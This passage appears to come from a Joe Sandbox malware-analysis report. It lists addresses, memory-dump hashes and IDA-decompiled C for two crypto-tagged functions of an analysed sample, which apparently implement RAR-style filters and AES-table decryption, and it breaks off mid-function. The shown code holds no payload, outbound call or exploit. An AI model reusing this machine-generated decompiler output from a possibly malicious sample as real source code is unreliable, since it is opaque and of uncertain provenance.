                0x003e7332
                0x003e7338
                0x003e7339
                0x003e733c
                0x00000000
                0x00000000
                0x003e733e
                0x003e733f
                0x003e7346
                0x003e734a
                0x003e734a
                0x003e734a
                0x00000000
                0x003e734a
                0x003e727f
                0x003e71ce
                0x003e718b
                0x003e718b
                0x00000000
                0x003e718b
                0x003e7170
                0x003e7174
                0x003e7175
                0x003e7176
                0x003e7177
                0x003e717e
                0x00000000
                0x00000000
                0x00000000

                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ffb42145b5e767f18ee67e45adf12e2c1a95711ce4dc362e3d3b7109edbe5567
                • Instruction ID: bc38c70cd2eecf0fa8a0b490025de6456e4bea3acf72a47f3839822365b09aa8
                • Opcode Fuzzy Hash: ffb42145b5e767f18ee67e45adf12e2c1a95711ce4dc362e3d3b7109edbe5567
                • Instruction Fuzzy Hash: BE12D1B16187568FC72ACF29C480AB9B7E0FF94304F104A2EE996C7780E334A995DB45
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003DC426 Relevance: .5, Instructions: 454COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 100%
                			E003DC426(signed char** __ecx) {
				void* __edi;
				void* _t188;
				signed int _t189;
				char _t192;
				void* _t197;
				void* _t198;
				signed int _t201;
				signed char _t202;
				void* _t212;
				signed int _t213;
				signed int _t215;
				signed int _t216;
				signed char* _t217;
				void* _t218;
				intOrPtr _t222;
				signed char* _t225;
				signed char _t228;
				void* _t237;
				void* _t238;
				signed int _t239;
				signed int _t242;
				signed char* _t245;
				signed int _t277;
				void* _t278;
				void* _t279;
				void* _t280;
				void* _t281;
				void* _t282;
				signed int _t286;
				intOrPtr _t287;
				void* _t288;
				signed char* _t289;
				void* _t290;
				signed int _t291;
				signed int _t292;
				char _t293;
				intOrPtr* _t295;
				signed char _t296;
				signed int _t301;
				signed int _t302;
				intOrPtr _t304;
				intOrPtr* _t306;
				signed char* _t307;
				signed int _t308;
				signed int _t314;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed char _t320;
				intOrPtr _t321;
				intOrPtr _t322;
				unsigned int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				void* _t331;
				signed char _t332;
				signed char* _t333;
				signed char _t335;
				signed int _t336;
				signed int _t337;
				void* _t338;
				void* _t339;
				void* _t340;
				signed int _t343;
				signed int _t344;
				signed char* _t345;
				signed int _t346;
				signed int _t348;
				intOrPtr _t350;
				signed int _t351;
				signed int _t354;
				void* _t358;
				signed int _t359;
				signed char* _t360;
				signed int _t361;
				void* _t362;
				void* _t363;

				_t349 = __ecx;
				_t188 =  *((intOrPtr*)(_t363 + 4)) - 1;
				if(_t188 == 0) {
					L84:
					_t189 =  *(_t349 + 0x14);
					_t295 =  *_t349;
					_t350 =  *((intOrPtr*)(_t349 + 0x1c));
					_t288 = _t189 - 4;
					if(_t288 > 0x3fffc) {
						L96:
						return 0;
					}
					_t338 = 0;
					_t192 = (_t189 & 0xffffff00 |  *((intOrPtr*)(_t363 + 0x64)) == 0x00000002) + 0xe8;
					 *((char*)(_t363 + 0x13)) = _t192;
					if(_t288 == 0) {
						L95:
						return 1;
					} else {
						goto L86;
					}
					do {
						L86:
						_t321 =  *_t295;
						_t295 = _t295 + 1;
						_t339 = _t338 + 1;
						_t350 = _t350 + 1;
						if(_t321 == 0xe8 || _t321 == _t192) {
							_t322 =  *_t295;
							if(_t322 >= 0) {
								if(_t322 - 0x1000000 < 0) {
									 *_t295 = _t322 - _t350;
								}
							} else {
								if(_t350 + _t322 >= 0) {
									 *_t295 = _t322 + 0x1000000;
								}
							}
							_t192 =  *((intOrPtr*)(_t363 + 0x13));
							_t295 = _t295 + 4;
							_t338 = _t339 + 4;
							_t350 = _t350 + 4;
						}
					} while (_t338 < _t288);
					goto L95;
				}
				_t197 = _t188 - 1;
				if(_t197 == 0) {
					goto L84;
				}
				_t198 = _t197 - 1;
				if(_t198 == 0) {
					_t289 =  *__ecx;
					_t340 = __ecx[5] - 0x15;
					if(_t340 > 0x3ffeb) {
						goto L96;
					}
					_t325 = __ecx[7] >> 4;
					 *(_t363 + 0x28) = _t325;
					if(_t340 == 0) {
						goto L95;
					}
					_t343 = (_t340 - 1 >> 4) + 1;
					 *(_t363 + 0x38) = _t343;
					do {
						_t201 =  *_t289 & 0x1f;
						if(_t201 < 0x10) {
							goto L82;
						}
						_t202 =  *((intOrPtr*)(_t201 + 0x40e078));
						if(_t202 == 0) {
							goto L82;
						}
						_t344 =  *(_t363 + 0x28);
						_t296 = 0;
						_t326 = _t202 & 0x000000ff;
						 *(_t363 + 0x30) = 0;
						 *(_t363 + 0x40) = _t326;
						_t358 = 0x12;
						do {
							if((_t326 & 1) != 0) {
								_t168 = _t358 + 0x18; // 0x2a
								if(E003DC985(_t289, _t168, 4) == 5) {
									E003DC9D0(_t289, E003DC985(_t289, _t358, 0x14) - _t344 & 0x000fffff, _t358, 0x14);
								}
								_t326 =  *(_t363 + 0x3c);
								_t296 =  *(_t363 + 0x2c);
							}
							_t296 = _t296 + 1;
							_t358 = _t358 + 0x29;
							 *(_t363 + 0x2c) = _t296;
						} while (_t358 <= 0x64);
						_t343 =  *(_t363 + 0x38);
						_t325 =  *(_t363 + 0x28);
						L82:
						_t289 =  &(_t289[0x10]);
						_t325 = _t325 + 1;
						_t343 = _t343 - 1;
						 *(_t363 + 0x28) = _t325;
						 *(_t363 + 0x38) = _t343;
					} while (_t343 != 0);
					goto L95;
				}
				_t212 = _t198 - 1;
				if(_t212 == 0) {
					_t213 = __ecx[1];
					_t345 = __ecx[5];
					 *(_t363 + 0x18) = _t213;
					_t290 = _t213 - 3;
					if(_t345 - 3 > 0x1fffd || _t290 > _t345) {
						goto L96;
					} else {
						_t215 = __ecx[2];
						 *(_t363 + 0x20) = _t215;
						if(_t215 > 2) {
							goto L96;
						}
						_t216 =  *__ecx;
						 *(_t363 + 0x14) = _t216;
						_t359 = 3;
						_t351 =  &(_t345[_t216]);
						_t217 = 0;
						 *(_t363 + 0x24) = _t351;
						_t301 = _t351 - _t290;
						 *(_t363 + 0x30) = 0;
						 *(_t363 + 0x28) = _t301;
						do {
							_t291 = 0;
							if(_t217 >= _t345) {
								goto L65;
							}
							_t327 =  *(_t363 + 0x18);
							_t360 =  &(_t217[_t301]);
							_t302 =  *(_t363 + 0x14);
							_t225 =  *(_t363 + 0x18) + 0xfffffffd - _t351;
							 *(_t363 + 0x34) = _t225;
							do {
								if( &(_t225[_t360]) >= _t327) {
									 *(_t363 + 0x3c) =  *_t360 & 0x000000ff;
									 *(_t363 + 0x3c) =  *(_t360 - 3) & 0x000000ff;
									 *(_t363 + 0x44) = E003F614A(_t327, ( *_t360 & 0x000000ff) - ( *(_t360 - 3) & 0x000000ff));
									 *(_t363 + 0x38) = E003F614A(_t327, ( *_t360 & 0x000000ff) - ( *(_t360 - 3) & 0x000000ff) + _t291 -  *(_t363 + 0x40));
									_t237 = E003F614A(_t327, ( *_t360 & 0x000000ff) - ( *(_t360 - 3) & 0x000000ff) + _t291 -  *(_t363 + 0x40));
									_t304 =  *((intOrPtr*)(_t363 + 0x4c));
									_t363 = _t363 + 0xc;
									_t332 =  *(_t363 + 0x2c);
									if(_t304 > _t332 || _t304 > _t237) {
										_t302 =  *(_t363 + 0x14);
										_t327 =  *(_t363 + 0x18);
										_t291 =  *(_t363 + 0x3c);
										if(_t332 > _t237) {
											_t291 =  *(_t363 + 0x38);
										}
									} else {
										_t302 =  *(_t363 + 0x14);
										_t327 =  *(_t363 + 0x18);
									}
								}
								_t228 = _t291 -  *_t302;
								_t302 = _t302 + 1;
								(_t360 - 3)[_t327] = _t228;
								_t360 =  &(_t360[3]);
								_t291 = _t228 & 0x000000ff;
								 *(_t363 + 0x14) = _t302;
								_t225 =  *(_t363 + 0x34);
							} while ( &(( *(_t363 + 0x34))[_t360]) < _t345);
							_t217 =  *(_t363 + 0x30);
							_t301 =  *(_t363 + 0x28);
							_t351 =  *(_t363 + 0x24);
							_t359 = 3;
							L65:
							_t217 =  &(_t217[1]);
							 *(_t363 + 0x30) = _t217;
						} while (_t217 < _t359);
						_t328 =  *(_t363 + 0x20);
						_t218 = _t345 - 2;
						if(_t328 >= _t218) {
							goto L95;
						}
						_t306 = _t328 + 2 + _t351;
						_t331 = (_t218 - _t328 - 1) / _t359 + 1;
						do {
							_t222 =  *((intOrPtr*)(_t306 - 1));
							 *((intOrPtr*)(_t306 - 2)) =  *((intOrPtr*)(_t306 - 2)) + _t222;
							 *_t306 =  *_t306 + _t222;
							_t306 = _t306 + _t359;
							_t331 = _t331 - 1;
						} while (_t331 != 0);
						goto L95;
					}
				}
				_t238 = _t212 - 1;
				if(_t238 == 0) {
					_t307 = __ecx[5];
					_t333 =  *__ecx;
					_t239 = __ecx[1];
					 *(_t363 + 0x30) = _t333;
					 *(_t363 + 0x34) = _t307;
					 *(_t363 + 0x38) = _t239;
					 *(_t363 + 0x40) =  &(_t333[_t307]);
					if(_t307 > 0x20000 || _t239 > 0x80 || _t239 == 0) {
						goto L96;
					} else {
						_t346 = 0;
						 *(_t363 + 0x3c) = 0;
						if(_t239 == 0) {
							goto L95;
						} else {
							goto L20;
						}
						do {
							L20:
							 *(_t363 + 0x24) =  *(_t363 + 0x24) & 0x00000000;
							 *(_t363 + 0x20) =  *(_t363 + 0x20) & 0x00000000;
							_t354 = 0;
							 *(_t363 + 0x1c) =  *(_t363 + 0x1c) & 0x00000000;
							_t292 = 0;
							 *(_t363 + 0x18) =  *(_t363 + 0x18) & 0x00000000;
							_t361 = 0;
							 *(_t363 + 0x20) = 0;
							E003EFFF0(_t346, _t363 + 0x44, 0, 0x1c);
							 *(_t363 + 0x38) =  *(_t363 + 0x38) & 0;
							_t363 = _t363 + 0xc;
							 *(_t363 + 0x28) = _t346;
							if(_t346 >=  *(_t363 + 0x34)) {
								_t242 =  *(_t363 + 0x38);
								goto L49;
							} else {
								goto L21;
							}
							do {
								L21:
								_t308 =  *(_t363 + 0x20);
								 *(_t363 + 0x18) = _t308 -  *(_t363 + 0x1c);
								_t245 =  *(_t363 + 0x30);
								 *(_t363 + 0x1c) = _t308;
								_t335 =  *_t245;
								 *(_t363 + 0x30) =  &(_t245[1]);
								_t314 = ( *(_t363 + 0x18) * _t354 + _t361 *  *(_t363 + 0x18) + _t292 *  *(_t363 + 0x20) +  *(_t363 + 0x24) * 0x00000008 >> 0x00000003 & 0x000000ff) - (_t335 & 0x000000ff);
								 *( *(_t363 + 0x28) +  *(_t363 + 0x40)) = _t314;
								_t357 = _t335 << 3;
								 *(_t363 + 0x24) = _t314 -  *(_t363 + 0x24);
								 *(_t363 + 0x28) = _t314;
								 *((intOrPtr*)(_t363 + 0x48)) =  *((intOrPtr*)(_t363 + 0x48)) + E003F614A(_t335, _t335 << 3);
								 *((intOrPtr*)(_t363 + 0x50)) =  *((intOrPtr*)(_t363 + 0x50)) + E003F614A(_t335, (_t335 << 3) -  *(_t363 + 0x20));
								 *((intOrPtr*)(_t363 + 0x58)) =  *((intOrPtr*)(_t363 + 0x58)) + E003F614A(_t335,  *(_t363 + 0x24) + (_t335 << 3));
								 *((intOrPtr*)(_t363 + 0x60)) =  *((intOrPtr*)(_t363 + 0x60)) + E003F614A(_t335, (_t335 << 3) -  *(_t363 + 0x24));
								 *((intOrPtr*)(_t363 + 0x68)) =  *((intOrPtr*)(_t363 + 0x68)) + E003F614A(_t335,  *(_t363 + 0x28) + (_t335 << 3));
								 *((intOrPtr*)(_t363 + 0x70)) =  *((intOrPtr*)(_t363 + 0x70)) + E003F614A(_t335, _t357 -  *(_t363 + 0x18));
								 *((intOrPtr*)(_t363 + 0x78)) =  *((intOrPtr*)(_t363 + 0x78)) + E003F614A(_t335, _t357 +  *(_t363 + 0x18));
								_t363 = _t363 + 0x1c;
								if(( *(_t363 + 0x2c) & 0x0000001f) != 0) {
									_t354 =  *(_t363 + 0x14);
								} else {
									_t336 =  *(_t363 + 0x44);
									_t277 = 0;
									 *(_t363 + 0x44) =  *(_t363 + 0x44) & 0;
									_t318 = 1;
									do {
										if( *(_t363 + 0x44 + _t318 * 4) < _t336) {
											_t336 =  *(_t363 + 0x44 + _t318 * 4);
											_t277 = _t318;
										}
										 *(_t363 + 0x44 + _t318 * 4) =  *(_t363 + 0x44 + _t318 * 4) & 0x00000000;
										_t318 = _t318 + 1;
									} while (_t318 < 7);
									_t354 =  *(_t363 + 0x14);
									_t278 = _t277 - 1;
									if(_t278 == 0) {
										if(_t292 >= 0xfffffff0) {
											_t292 = _t292 - 1;
										}
										goto L46;
									}
									_t279 = _t278 - 1;
									if(_t279 == 0) {
										if(_t292 < 0x10) {
											_t292 = _t292 + 1;
										}
										goto L46;
									}
									_t280 = _t279 - 1;
									if(_t280 == 0) {
										if(_t361 >= 0xfffffff0) {
											_t361 = _t361 - 1;
										}
										goto L46;
									}
									_t281 = _t280 - 1;
									if(_t281 == 0) {
										if(_t361 < 0x10) {
											_t361 = _t361 + 1;
										}
										goto L46;
									}
									_t282 = _t281 - 1;
									if(_t282 == 0) {
										if(_t354 < 0xfffffff0) {
											goto L46;
										}
										_t354 = _t354 - 1;
										L34:
										 *(_t363 + 0x14) = _t354;
										goto L46;
									}
									if(_t282 != 1 || _t354 >= 0x10) {
										goto L46;
									} else {
										_t354 = _t354 + 1;
										goto L34;
									}
								}
								L46:
								_t242 =  *(_t363 + 0x38);
								_t316 =  *(_t363 + 0x28) + _t242;
								 *(_t363 + 0x2c) =  *(_t363 + 0x2c) + 1;
								 *(_t363 + 0x28) = _t316;
							} while (_t316 <  *(_t363 + 0x34));
							_t346 =  *(_t363 + 0x3c);
							L49:
							_t346 = _t346 + 1;
							 *(_t363 + 0x3c) = _t346;
						} while (_t346 < _t242);
						goto L95;
					}
				}
				if(_t238 != 1) {
					goto L95;
				}
				_t319 = __ecx[5];
				_t362 = 0;
				_t337 = __ecx[1];
				 *(_t363 + 0x28) = _t319;
				 *(_t363 + 0x2c) = _t319 + _t319;
				if(_t319 > 0x20000 || _t337 > 0x400 || _t337 == 0) {
					goto L96;
				} else {
					_t286 = _t337;
					 *(_t363 + 0x24) = _t337;
					do {
						_t293 = 0;
						_t348 = _t319;
						if(_t319 <  *(_t363 + 0x2c)) {
							_t320 =  *(_t363 + 0x2c);
							goto L12;
							L12:
							_t287 =  *_t349;
							_t293 = _t293 -  *((intOrPtr*)(_t287 + _t362));
							_t362 = _t362 + 1;
							 *((char*)(_t287 + _t348)) = _t293;
							_t348 = _t348 + _t337;
							if(_t348 < _t320) {
								goto L12;
							} else {
								_t319 =  *(_t363 + 0x28);
								_t286 =  *(_t363 + 0x24);
								goto L14;
							}
						}
						L14:
						_t319 = _t319 + 1;
						_t286 = _t286 - 1;
						 *(_t363 + 0x28) = _t319;
						 *(_t363 + 0x24) = _t286;
					} while (_t286 != 0);
					goto L95;
				}
			}

















































































                0x003dc430
                0x003dc433
                0x003dc436
                0x003dc90a
                0x003dc90a
                0x003dc90d
                0x003dc90f
                0x003dc912
                0x003dc91b
                0x003dc979
                0x00000000
                0x003dc979
                0x003dc925
                0x003dc927
                0x003dc929
                0x003dc92f
                0x003dc975
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003dc931
                0x003dc931
                0x003dc931
                0x003dc933
                0x003dc934
                0x003dc935
                0x003dc939
                0x003dc93f
                0x003dc943
                0x003dc95e
                0x003dc962
                0x003dc962
                0x003dc945
                0x003dc94a
                0x003dc952
                0x003dc952
                0x003dc94a
                0x003dc964
                0x003dc968
                0x003dc96b
                0x003dc96e
                0x003dc96e
                0x003dc971
                0x00000000
                0x003dc931
                0x003dc43c
                0x003dc43f
                0x00000000
                0x00000000
                0x003dc445
                0x003dc448
                0x003dc847
                0x003dc849
                0x003dc852
                0x00000000
                0x00000000
                0x003dc85b
                0x003dc85e
                0x003dc864
                0x00000000
                0x00000000
                0x003dc86e
                0x003dc86f
                0x003dc873
                0x003dc876
                0x003dc87c
                0x00000000
                0x00000000
                0x003dc87e
                0x003dc886
                0x00000000
                0x00000000
                0x003dc888
                0x003dc88c
                0x003dc88e
                0x003dc893
                0x003dc897
                0x003dc89b
                0x003dc89c
                0x003dc8a3
                0x003dc8a7
                0x003dc8b6
                0x003dc8d1
                0x003dc8d1
                0x003dc8d6
                0x003dc8da
                0x003dc8da
                0x003dc8de
                0x003dc8df
                0x003dc8e2
                0x003dc8e6
                0x003dc8eb
                0x003dc8ef
                0x003dc8f3
                0x003dc8f3
                0x003dc8f6
                0x003dc8f7
                0x003dc8fa
                0x003dc8fe
                0x003dc8fe
                0x00000000
                0x003dc908
                0x003dc44e
                0x003dc451
                0x003dc6ee
                0x003dc6f1
                0x003dc6f4
                0x003dc6f8
                0x003dc703
                0x00000000
                0x003dc711
                0x003dc711
                0x003dc714
                0x003dc71b
                0x00000000
                0x00000000
                0x003dc721
                0x003dc723
                0x003dc729
                0x003dc72a
                0x003dc72d
                0x003dc731
                0x003dc735
                0x003dc737
                0x003dc73b
                0x003dc73f
                0x003dc73f
                0x003dc743
                0x00000000
                0x00000000
                0x003dc749
                0x003dc74d
                0x003dc754
                0x003dc75b
                0x003dc75d
                0x003dc761
                0x003dc765
                0x003dc76f
                0x003dc776
                0x003dc782
                0x003dc797
                0x003dc79b
                0x003dc7a0
                0x003dc7a4
                0x003dc7a7
                0x003dc7ad
                0x003dc7bd
                0x003dc7c3
                0x003dc7c7
                0x003dc7cb
                0x003dc7cd
                0x003dc7cd
                0x003dc7b3
                0x003dc7b3
                0x003dc7b7
                0x003dc7b7
                0x003dc7ad
                0x003dc7d3
                0x003dc7d5
                0x003dc7d6
                0x003dc7da
                0x003dc7dd
                0x003dc7e6
                0x003dc7ec
                0x003dc7ec
                0x003dc7f6
                0x003dc7fa
                0x003dc7fe
                0x003dc804
                0x003dc805
                0x003dc805
                0x003dc806
                0x003dc80a
                0x003dc812
                0x003dc816
                0x003dc81b
                0x00000000
                0x00000000
                0x003dc826
                0x003dc82d
                0x003dc830
                0x003dc830
                0x003dc833
                0x003dc836
                0x003dc838
                0x003dc83a
                0x003dc83a
                0x00000000
                0x003dc83f
                0x003dc703
                0x003dc457
                0x003dc45a
                0x003dc4d6
                0x003dc4d9
                0x003dc4db
                0x003dc4de
                0x003dc4e4
                0x003dc4e8
                0x003dc4ec
                0x003dc4f6
                0x00000000
                0x003dc50f
                0x003dc50f
                0x003dc511
                0x003dc517
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003dc51d
                0x003dc51d
                0x003dc51d
                0x003dc526
                0x003dc52b
                0x003dc52d
                0x003dc532
                0x003dc534
                0x003dc539
                0x003dc53f
                0x003dc543
                0x003dc548
                0x003dc54c
                0x003dc54f
                0x003dc557
                0x003dc6d8
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003dc55d
                0x003dc55d
                0x003dc55d
                0x003dc56b
                0x003dc56f
                0x003dc573
                0x003dc580
                0x003dc583
                0x003dc5a9
                0x003dc5af
                0x003dc5be
                0x003dc5c2
                0x003dc5c6
                0x003dc5cf
                0x003dc5df
                0x003dc5ef
                0x003dc5ff
                0x003dc60f
                0x003dc61d
                0x003dc62a
                0x003dc62e
                0x003dc636
                0x003dc6b2
                0x003dc638
                0x003dc638
                0x003dc63c
                0x003dc63e
                0x003dc644
                0x003dc645
                0x003dc649
                0x003dc64b
                0x003dc64f
                0x003dc64f
                0x003dc651
                0x003dc656
                0x003dc657
                0x003dc65c
                0x003dc660
                0x003dc663
                0x003dc6ad
                0x003dc6af
                0x003dc6af
                0x00000000
                0x003dc6ad
                0x003dc665
                0x003dc668
                0x003dc6a5
                0x003dc6a7
                0x003dc6a7
                0x00000000
                0x003dc6a5
                0x003dc66a
                0x003dc66d
                0x003dc69d
                0x003dc69f
                0x003dc69f
                0x00000000
                0x003dc69d
                0x003dc66f
                0x003dc672
                0x003dc695
                0x003dc697
                0x003dc697
                0x00000000
                0x003dc695
                0x003dc674
                0x003dc677
                0x003dc68d
                0x00000000
                0x00000000
                0x003dc68f
                0x003dc684
                0x003dc684
                0x00000000
                0x003dc684
                0x003dc67c
                0x00000000
                0x003dc683
                0x003dc683
                0x00000000
                0x003dc683
                0x003dc67c
                0x003dc6b6
                0x003dc6ba
                0x003dc6be
                0x003dc6c0
                0x003dc6c4
                0x003dc6c8
                0x003dc6d2
                0x003dc6dc
                0x003dc6dc
                0x003dc6dd
                0x003dc6e1
                0x00000000
                0x003dc6e9
                0x003dc4f6
                0x003dc45f
                0x00000000
                0x00000000
                0x003dc465
                0x003dc468
                0x003dc46a
                0x003dc46d
                0x003dc474
                0x003dc47e
                0x00000000
                0x003dc498
                0x003dc498
                0x003dc49a
                0x003dc49e
                0x003dc49e
                0x003dc4a0
                0x003dc4a6
                0x003dc4a8
                0x003dc4a8
                0x003dc4ac
                0x003dc4ac
                0x003dc4ae
                0x003dc4b1
                0x003dc4b2
                0x003dc4b5
                0x003dc4b9
                0x00000000
                0x003dc4bb
                0x003dc4bb
                0x003dc4bf
                0x00000000
                0x003dc4bf
                0x003dc4b9
                0x003dc4c3
                0x003dc4c3
                0x003dc4c4
                0x003dc4c7
                0x003dc4cb
                0x003dc4cb
                0x00000000
                0x003dc49e

                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a4da1aaa9dffbecec8c7afa99821a62cdddb31eb3a1eb96859761e3846912b16
                • Instruction ID: 7961bd9e7ae4da1e1b6d5e3d18daaaeea6ce9e3b2774f83031ad3c7818b4eef1
                • Opcode Fuzzy Hash: a4da1aaa9dffbecec8c7afa99821a62cdddb31eb3a1eb96859761e3846912b16
                • Instruction Fuzzy Hash: 0CF1BD726283028FC716CF28D494A2ABBE5EF8A314F256A2FF585D7391D730D945CB42
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003DE9B7 Relevance: .3, Instructions: 320COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 100%
                			E003DE9B7(void* __ebx, intOrPtr __ecx, void* __esi) {
				void* _t220;
				intOrPtr _t227;
				void* _t250;
				signed char _t252;
				signed int _t300;
				signed int* _t303;
				signed char _t346;
				unsigned int _t348;
				signed int _t351;
				unsigned int _t354;
				signed int* _t357;
				signed int _t361;
				signed int _t366;
				signed int _t370;
				signed int _t374;
				signed char _t376;
				signed int* _t380;
				signed int _t387;
				signed int _t392;
				intOrPtr _t394;
				signed char _t395;
				signed char _t396;
				signed char _t397;
				unsigned int _t399;
				signed int _t402;
				unsigned int _t405;
				unsigned int _t407;
				unsigned int _t408;
				signed int _t409;
				signed int _t414;
				unsigned int _t415;
				unsigned int _t416;
				signed int _t418;
				signed int _t422;
				signed int _t423;
				intOrPtr _t425;
				signed int _t426;
				void* _t430;
				void* _t431;

				_t407 =  *(_t430 + 0x6c);
				_t425 = __ecx;
				 *((intOrPtr*)(_t430 + 0x24)) = __ecx;
				if(_t407 != 0) {
					_t408 = _t407 >> 4;
					 *(_t430 + 0x6c) = _t408;
					if( *((char*)(__ecx)) == 0) {
						 *((intOrPtr*)(_t430 + 0x38)) = __ecx + 8;
						E003F0320(_t430 + 0x5c, __ecx + 8, 0x10);
						_t431 = _t430 + 0xc;
						if(_t408 == 0) {
							L13:
							return E003F0320( *((intOrPtr*)(_t431 + 0x38)), _t431 + 0x58, 0x10);
						}
						_t392 =  *(_t431 + 0x68);
						 *(_t431 + 0x24) = _t392 + 8;
						_t227 =  *((intOrPtr*)(_t431 + 0x78));
						_t394 = _t392 - _t227 - 8;
						 *((intOrPtr*)(_t431 + 0x34)) = _t394;
						_t357 = _t227 + 8;
						 *(_t431 + 0x28) = _t357;
						do {
							_t414 =  *(_t425 + 4);
							 *(_t431 + 0x30) = _t357 + _t394;
							E003DE985(_t431 + 0x54, _t357 + _t394, (_t414 << 4) + 0x18 + _t425);
							_t395 =  *(_t431 + 0x4c);
							 *(_t431 + 0x10) =  *(0x4161c8 + (_t395 & 0x000000ff) * 4) ^  *(0x416dc8 + ( *(_t431 + 0x53) & 0x000000ff) * 4) ^  *(0x4169c8 + ( *(_t431 + 0x56) & 0x000000ff) * 4);
							_t346 =  *(_t431 + 0x58);
							_t361 =  *(_t431 + 0x10) ^  *(0x4165c8 + (_t346 & 0x000000ff) * 4);
							 *(_t431 + 0x10) = _t361;
							 *(_t431 + 0x3c) = _t361;
							_t396 =  *(_t431 + 0x50);
							_t366 =  *(0x4165c8 + (_t395 & 0x000000ff) * 4) ^  *(0x4161c8 + (_t396 & 0x000000ff) * 4) ^  *(0x416dc8 + ( *(_t431 + 0x57) & 0x000000ff) * 4) ^  *(0x4169c8 + ( *(_t431 + 0x5a) & 0x000000ff) * 4);
							 *(_t431 + 0x1c) = _t366;
							 *(_t431 + 0x40) = _t366;
							_t397 =  *(_t431 + 0x54);
							 *(_t431 + 0x14) =  *(0x4169c8 + ( *(_t431 + 0x4e) & 0x000000ff) * 4) ^  *(0x4165c8 + (_t396 & 0x000000ff) * 4);
							_t370 =  *(_t431 + 0x14) ^  *(0x4161c8 + (_t397 & 0x000000ff) * 4) ^  *(0x416dc8 + ( *(_t431 + 0x5b) & 0x000000ff) * 4);
							 *(_t431 + 0x14) = _t370;
							 *(_t431 + 0x44) = _t370;
							 *(_t431 + 0x18) =  *(0x416dc8 + ( *(_t431 + 0x4f) & 0x000000ff) * 4) ^  *(0x4169c8 + ( *(_t431 + 0x52) & 0x000000ff) * 4);
							_t374 =  *(_t431 + 0x18) ^  *(0x4165c8 + (_t397 & 0x000000ff) * 4) ^  *(0x4161c8 + (_t346 & 0x000000ff) * 4);
							_t250 = _t414 - 1;
							 *(_t431 + 0x18) = _t374;
							 *(_t431 + 0x48) = _t374;
							if(_t250 <= 1) {
								goto L9;
							}
							_t409 =  *(_t431 + 0x1c);
							_t422 = (_t250 + 2 << 4) + _t425;
							_t426 =  *(_t431 + 0x10);
							 *(_t431 + 0x18) = _t422;
							 *(_t431 + 0x20) = _t250 - 1;
							do {
								_t405 =  *_t422 ^  *(_t431 + 0x14);
								 *(_t431 + 0x10) =  *(_t422 - 8) ^ _t426;
								 *(_t431 + 0x1c) =  *(_t422 + 4) ^ _t374;
								_t354 =  *(_t422 - 4) ^ _t409;
								_t423 =  *(_t431 + 0x1c);
								_t426 =  *(0x4169c8 + (_t405 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4165c8 + (_t423 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x416dc8 + (_t354 >> 0x18) * 4) ^  *(0x4161c8 + ( *(_t431 + 0x10) & 0x000000ff) * 4);
								 *(_t431 + 0x3c) = _t426;
								_t409 =  *(0x4169c8 + (_t423 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4165c8 + ( *(_t431 + 0x10) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x416dc8 + (_t405 >> 0x18) * 4) ^  *(0x4161c8 + (_t354 & 0x000000ff) * 4);
								 *(_t431 + 0x40) = _t409;
								_t387 =  *(0x4165c8 + (_t354 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4169c8 + ( *(_t431 + 0x10) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x416dc8 + (_t423 >> 0x18) * 4) ^  *(0x4161c8 + (_t405 & 0x000000ff) * 4);
								 *(_t431 + 0x14) = _t387;
								 *(_t431 + 0x44) = _t387;
								_t422 =  *(_t431 + 0x18) - 0x10;
								 *(_t431 + 0x18) = _t422;
								_t374 =  *(0x4169c8 + (_t354 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4165c8 + (_t405 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x416dc8 + ( *(_t431 + 0x10) >> 0x18) * 4) ^  *(0x4161c8 + (_t423 & 0x000000ff) * 4);
								_t132 = _t431 + 0x20;
								 *_t132 =  *(_t431 + 0x20) - 1;
								 *(_t431 + 0x48) = _t374;
							} while ( *_t132 != 0);
							 *(_t431 + 0x1c) = _t409;
							_t408 =  *(_t431 + 0x74);
							 *(_t431 + 0x10) = _t426;
							_t425 =  *((intOrPtr*)(_t431 + 0x2c));
